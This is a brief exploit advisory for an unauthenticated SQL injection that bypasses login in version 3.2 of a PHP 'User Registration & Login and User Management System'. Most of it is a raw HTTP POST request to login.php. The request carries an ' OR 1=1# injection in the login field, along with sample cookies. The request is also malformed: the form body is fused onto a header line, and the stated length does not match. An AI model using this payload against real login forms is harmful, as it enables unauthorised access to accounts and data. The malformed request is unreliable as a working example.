Authored by Yusuf DinC

User Registration and Login and User Management System version 3.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

# Exploit Title: User Registration & Login and User Management System v3.2 - SQL Injection (Unauthenticated)
# Exploit Author: Yusuf DİNÇ
# Google Dork: NA
# Date: 05/03/2024
# Vendor Homepage:
# Software Link:
# Version: 3.2
# Tested on: Linux

POST /test/loginsystem/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://localhost
Connection: close
Referer: http://localhost/test/loginsystem/login.php
Cookie: csrftoken=WYNmntI3xnkUlg89ElNUCBp6mFVAZel8; sessionid=t5apbvw2jdnur3uvudxt8mcn7cdudbi5; PHPSESSID=1mnimk5b1591oukpi0kh90n0hv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1'+OR+1=1#&password=test&login=